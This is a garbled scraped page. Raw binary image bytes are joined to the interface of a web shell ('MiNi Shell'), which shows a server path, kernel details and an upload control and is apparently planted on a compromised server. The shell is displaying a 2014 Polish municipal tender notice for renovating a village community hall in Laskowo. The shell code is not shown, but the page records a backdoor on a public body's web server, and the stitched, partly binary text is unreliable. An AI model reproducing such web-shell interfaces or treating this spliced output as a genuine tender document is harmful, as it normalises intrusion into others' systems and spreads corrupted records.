JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140319/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140319/93064-N-2014.html

<p class="kh_header"><b>Rogoźno: Remont świetlicy wiejskiej w miejscowości Laskowo wraz z wyposażeniem i zagospodarowaniem otoczenia</b><br>
<b>Numer ogłoszenia: 93064 - 2014; data zamieszczenia: 19.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Rogoźno , ul. Nowa 2, 64-610 Rogoźno, woj. wielkopolskie, tel. 67 26 84 400, faks 67 26 18 075.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rogozno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont świetlicy wiejskiej w miejscowości Laskowo wraz z wyposażeniem i zagospodarowaniem otoczenia.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia obejmuje remont świetlicy wiejskiej w miejscowości Laskowo wraz z wyposażeniem i zagospodarowaniem otoczenia.

Wspólny Słownik Zamówień(CPV):
45.00.00.00-7 Roboty budowlane
45.11.11.00-9 Roboty w zakresie burzenia
45.11.12.91-4 Roboty w zakresie zagospodarowania terenu
45.11.13.00-1 Roboty rozbiórkowe
45.21.23.00-9 Roboty budowlane w zakresie budowy artystycznych i kulturalnych obiektów budowlanych
45.31.00.00-3 Roboty instalacyjne elektryczne
45.32.40.00-4 Roboty w zakresie okładziny tynkowej
45.33.00.00-9 Roboty instalacyjne wodno-kanalizacyjne i sanitarne
45.33.10.00-6 Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych
45.33.20.00-3 Roboty instalacyjne wodne i kanalizacyjne
45.40.00.00-1 Roboty wykończeniowe w zakresie obiektów budowlanych
45.42.10.00-4 Roboty w zakresie stolarki budowlanej
45.43.00.00-0 Pokrywanie podłóg i ścian
45.43.10.00-7 Kładzenie płytek
45.44.00.00-3 Roboty malarskie i szklarskie

Szczegółowy opis przedmiotu zamówienia: 
Roboty rozbiórkowe:
	Rozebranie ścian o powierzchni 10,43 m2
	Rozebranie pieców i trzonów o objętości 1,188 m3
	Zerwanie posadzki i wykładzin o powierzchni 16,90 m2
	Rozebranie podłóg drewnianych o powierzchni 104,00 m2
	Rozebranie legarów o długości 91,20 m
Transport gruzu o objętości 5,80 m3 na Gminne wysypisko odpadów w miejscowości Studzieniec.
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.

Roboty remontowe:
	Wykucie otworów w ścianach o powierzchni 1,616 m3
	Przebicie otworów w ścianach 1 szt.
	Wykonanie przesklepień otworów o objętości 0,302 m3
	Ułożenie nadproży prefabrykowanych w otworach o łącznej długości 19,50 m  
	Wykucie z muru ościeżnic drzwiowych 3 szt.
	Zamurowanie otworów w ścianach bloczkami z betonu komórkowego o objętości 1,506 m3
	Wykonanie ścian z bloczków z betonu komórkowego o powierzchni 10,516 m2
	Wykonanie ścianek działowych z płytek gazobetonowych gr. 12 cm o powierzchni 17,88 m2
	Wykonanie ścianek działowych z płytek gazobetonowych gr. 6 cm o powierzchni 6,36 m2
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.


Podłoża i posadzki
	Wykonanie podkładów z ubitych materiałów sypkich o objętości 3,80 m3
	Podkłady betonowe na podłożu gruntowym C8/10 o objętości 10,40 m3
Posadzki cementowe zatarte na ostro o grubości 60 mm wraz z uzbrojeniem siatką, ułożeniem folii 0,2 mm oraz izolacją styropianem FS 20 gr. 5 cm 134,50 m2
Wykonanie posadzek z płytek typu gress o wymiarach 30x30 cm kolor oraz faktura do uzgodnienia z Zamawiającym o powierzchni 134,50 m2
Wykonanie cokolików z płytek wysokości 10 cm wkładanych na klej o długości 58,04 m, kolor i faktura do uzgodnienia z Zamawiającym
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.

Tynki, okładziny, malowanie
	Odbicie tynków zewnętrznych o łącznej powierzchni 34,80 m2
	Wykonanie tynków wewnętrznych kat. III o powierzchni 51,90 m2
	Wzmocnienie ścian nieotynkowanych siatką na zaprawie klejowej o powierzchni 120,54 m2
	Zeskrobanie i zmycie starej farby o powierzchni 227,144 m2
	Szpachlowanie ścian wewnętrznych o powierzchni 243,344 m2
	Licowanie ścian płytkami glazurowymi na klej o powierzchni 65,480 m2
	Gruntowanie podłoży o powierzchni 228,30 m2
	Wykonanie tynków żywicznych o grubości 1,5 mm o łącznej powierzchni 68,614 m2
Wykonanie i montaż desek odbojowych drewnianych lakierowanych szerokości 25 cm o łącznej długości 52,78 m
Malowanie farbami emulsyjnymi powierzchni wewnętrznych o powierzchni ścian 132,56 m2 oraz sufitów o powierzchni 32,40 m2
Wykonanie okładzin stropów płytami GK wodoodpornej na ruszcie z metalowych kształtowników CD i UD o powierzchni 32,40 m2
Wykonanie stropu podwieszonego na metalowym ruszcie z kształtowników CD i UD o powierzchni 102,10 m2
Obsadzenie kratek wentylacyjnych w ścianach 4 szt., obsadzenie kratek wentylacyjnych podokiennych nawiewnych o wymiarach 60x204 dwustronnych 4 szt.
Montaż wentylacji wywiewnej wykonanej z rury dwupłaszczowej z blachy nierdzewnej średnicy 150 mm długości 2,5 m
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.

Stolarka otworowa
Montaż drzwi jednoskrzydłowych wewnątrz lokalowych kompletnych o ościeżnicy metalowej 4 sztuki wraz z odbojami, drzwi do wc z nawiewem
Montaż drzwi PCV dwuskrzydłowych z obróbką o wymiarach 1,50x2,05 m
Montaż okien uchylno-rozwiernych z PCV o współczynniku U nie gorszym niż 1,1 W/(m2*K) o powierzchni 1,89 m2
Demontaż i montaż okien uchylno-rozwiernych z PCV wraz z oknem podawczym o współczynniku U nie gorszym niż 1,1 W/(m2*K) o powierzchni 14,489 m2
Montaż parapetów wewnętrznych z PVC o długości 13,98 m oraz jednego z MDF dwustronnie zaokrąglonego o długości 1,1 m
Montaż krat ocynkowanych ogniowo 2 szt. o wymiarach 1,5x1,3 m
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.

Elewacja, ocieplenie
	Roboty ziemne o objętości 14,28 m3
	Przygotowanie starego podłoża pod ocieplenie o powierzchni 13,78 m2 oraz 201,086 m2
	Wykonanie izolacji przeciwwilgociowej pionowej na zimno o powierzchni 13,78 m2
	Izolacja cieplna z płyt izolacyjnych XPS 30 SF grubości 5 cm o powierzchni 13,78 m2
Wykonanie izolacji przeciwwilgociowej z folii polietylenowej kubełkowej o powierzchni 13,78 m2
Ocieplenie ścian budynku płytami styropianowymi frezowanymi EPS 70-040 grubości 10 cm metodą lekką wraz z przygotowaniem podłoża i wykonaniem wyprawy elewacyjnej cienkowarstwowej z gotowej suchej mieszanki wraz z malowaniem o powierzchni 201,086 m2
Wykonanie elewacji z tynku żywicznego grubości 1,5 mm i wysokości 20 cm o powierzchni 16,656 m2
Wykonanie obróbek blacharskich parapetów z blachy powlekanej o łącznej powierzchni 4,68 m2
Demontaż i ponowny montaż drobnych elementów zamontowanych na ścianach.
Wykonanie betonowej opaski o szerokości 50 cm i grubości 15 cm o łącznej powierzchni 28,75 m2
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.

Dach
	Rozebranie rynien z blachy długości 28,50 m
	Rozebranie rur spustowych z blachy o dł. 15,80 m
Rozebranie obróbek murów ogniowych, okapów, kołnierzy i gzymsów o powierzchni 10,184 m2
 	Montaż rynien dachowych średnicy 15 cm z blachy ocynkowanej dł. 28,90 m
	Montaż rynien spustowych o średnicy 12,5 cm z blachy ocynkowanej dł. 15,80 m
	Wykonanie obróbek blacharskich o powierzchni 39,24 m2
	Rozebranie kominów wolnostojących o objętości 0,945 m3
Wykonanie komina wolnostojącego wieloprzewodowego z cegły klinkierowej o objętości 0,64 m3
	Wykonanie izolacji dachu z płyt styropianowych EPS 100/0,38 FS 20 gr. 14 cm
	Pokrycie dachu papą termozgrzewalną SBS gr. 5,2 mm
Wszystkie elementy związane z realizacja przedmiotu zamówienia, parametry, wielkości, wymiary zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.

Powyższe prace należy wykonać na podstawie dostarczonej dokumentacji technicznej stanowiącej załącznik do niniejszej SIWZ.
Instalacje wod.-kan. na podstawie dokumentacji technicznej stanowiącej załącznik do niniejszej SIWZ.
Instalacja gazu na podstawie dokumentacji technicznej stanowiącej załącznik do niniejszej SIWZ.
Instalacja C.O. na podstawie dokumentacji technicznej stanowiącej załącznik do niniejszej SIWZ.

Wszystkie elementy związane z realizacja przedmiotu zamówienia zawiera dokumentacja techniczna będąca załącznikiem do SIWZ.
Podstawą oszacowania wartości zamówienia jest dokumentacja projektowa stanowiąca załącznik do niniejszej SIWZ, załączony przedmiar jest tylko załącznikiem pomocniczym. 

W ramach zadania Wykonawca zobowiązany jest do zakupu, dostawy oraz montażu elementów stanowiących wyposażenie zaplecza kuchennego oraz sali świetlicy zgodnie z załącznikiem nr 8 i 9 do SIWZ z uwzględnieniem minimalnych parametrów dla podanego wyposażenia.
Na wyposażenie składają się następujące elementy:
Zmywarka wolnostojąca, Szafa chłodnicza dwudrzwiowa, chłodziarko-zamrażarka, stół z blatem ze stali nierdzewnej 4 szt., szafki kuchenne 3 szt., stół drewniany 10 szt., krzesła drewniane 70 szt.

Wykonawca zaprojektuje wraz z Zamawiającym oraz dostarczy i zamontuje tablicę przedstawiającą historie, położenie oraz walory przyrodnicze miejscowości, w której będzie ustawiona dana tablica (Wykonawca przedstawi Zamawiającemu projekt tablicy celem akceptacji). Tekst, treści, zdjęcia oraz grafiki dostarczy Zamawiający. Minimalne wymiary tablicy 3,0 x 1,0 m (materiał: lico wykonane z blachy ocynkowanej, grafika: wydruk solwentowy lub inny o podobnej jakości i trwałości na białej folii 100% pokrycia nadrukiem, zabezpieczony odpowiednim laminatem gwarantującym jej trwałość oraz czytelność przez okres minimum 5 lat). Tablica zamontowana na odpowiednio trwałej i wytrzymałej konstrukcji stalowej osadzonej gruncie za pomocą odpowiednich fundamentów. Zabezpieczenie całej konstrukcji powinno zabezpieczyć ją przed szkodliwym działaniem warunków atmosferycznych przez okres minimum 5 lat. Tablica powyżej poziomu terenu na wysokości 1,5 m dolna krawędź. 

Wykonawca zobowiązany jest również do zakupu, dostawy oraz montażu elementów boiska do siatkówki, w skład, których wchodzą następujące elementy:
Słupki do siatkówki o profilu kwadratowym o min. przekroju 80x80 mm wraz elementami służącymi do naciągu siatki, tuleje montażowe do słupków wmontowane w podłoże ocynkowane ogniowo, dekle maskujące tuleje montażowe, siatka o wymiarach 9,5 x 1,0 m wraz ze sznurkami naciągowymi z naciągiem z polipropylenu. 

UWAGA!!!
W związku z faktem, iż cena ofertowa ma charakter ryczałtowy, przed złożeniem oferty Zamawiający informuje o możliwości przeprowadzenia wizji lokalnej terenu budowy i jego otoczenia, po ustaleniu z Zamawiającym dogodnych terminów. Koszty dokonania wizji lokalnej terenu budowy ponosi Wykonawca.

Operacja współfinansowana jest ze środków Unii Europejskiej w ramach działania 413 Wdrażanie lokalnych strategii rozwoju objętego PROW na lata 2007-2013 dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.11.00-9, 45.11.12.91-4, 45.11.13.00-1, 45.21.23.00-9, 45.31.00.00-3, 45.32.40.00-4, 45.33.00.00-9, 45.33.10.00-6, 45.33.20.00-3, 45.40.00.00-1, 45.42.10.00-4, 45.43.00.00-0, 45.43.10.00-7, 45.44.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.08.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 5 000,00 zł (słownie: pięć tysięcy zł.00/100) w formach przewidzianych w ustawie z dni 29 stycznia 2004 r. Prawo Zamówień Publicznych art. 45.
Wadium wnoszone w pieniądzu należy wpłacać przelewem na rachunek bankowy Gminy Rogoźno, ul. Nowa 2,64-610 Rogoźno  
Bank: BS Czarnków, o/Rogoźno,
Nr konta 56 8951 0009 3900 0114 2000 0020</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda załączenia do oferty aktualnego odpisu z właściwego rejestru albo aktualne zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, a w stosunku do osób fizycznych oświadczenia w zakresie art.24 ust. 1 pkt.2 ustawy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda załączenia do oferty wykazu robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, dat i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone, informacje te zostaną przygotowane na podstawie załącznika nr 4 do SIWZ, Zamawiający warunek uzna się za spełniony jeśli Wykonawca wykaże iż w ostatnich 5 latach wykonał 4 tożsame prace o wartości minimalnej 150 000,00 zł każda,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda załączenia do oferty wykazu sprzętu technicznego i narzędzi niezbędnych do wykonania zamówienia, którymi dysponuje/będzie dysponował Wykonawca - wg. załącznika nr 5 do SIWZ.  Zamawiający uzna ten warunek za spełniony, jeśli Wykonawca wykaże, że dysponuje/będzie dysponować następującym sprzętem: min. 1 samochód dostawczy o min. masie 3,5 tony, min. 1 szt. betoniarki elektrycznej o poj. min. 150 litrów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający żąda załączenia do oferty wykazu osób, którymi Wykonawca zamierza wykonać przedmiot zamówienia zgodnie z załącznikiem nr 6 do SIWZ, zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że dysponuje / będzie dysponował co najmniej 1 osobą kierującą robotami w każdej branży tj. ogólnobudowlanej, instalacyjnej i elektrycznej.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.rogozno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Rogoźnie
ul. Nowa 2
64-610 Rogoźno
pok. nr 21.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.04.2014 godzina 09:45, miejsce: Urząd Miejski w Rogoźnie
ul. Nowa 2
64-610 Rogoźno
pok. nr 15 (kancelaria).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Operacja współfinansowana jest ze środków Unii Europejskiej w ramach działania 413 Wdrażanie lokalnych strategii rozwoju objętego PROW na lata 2007-2013 dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com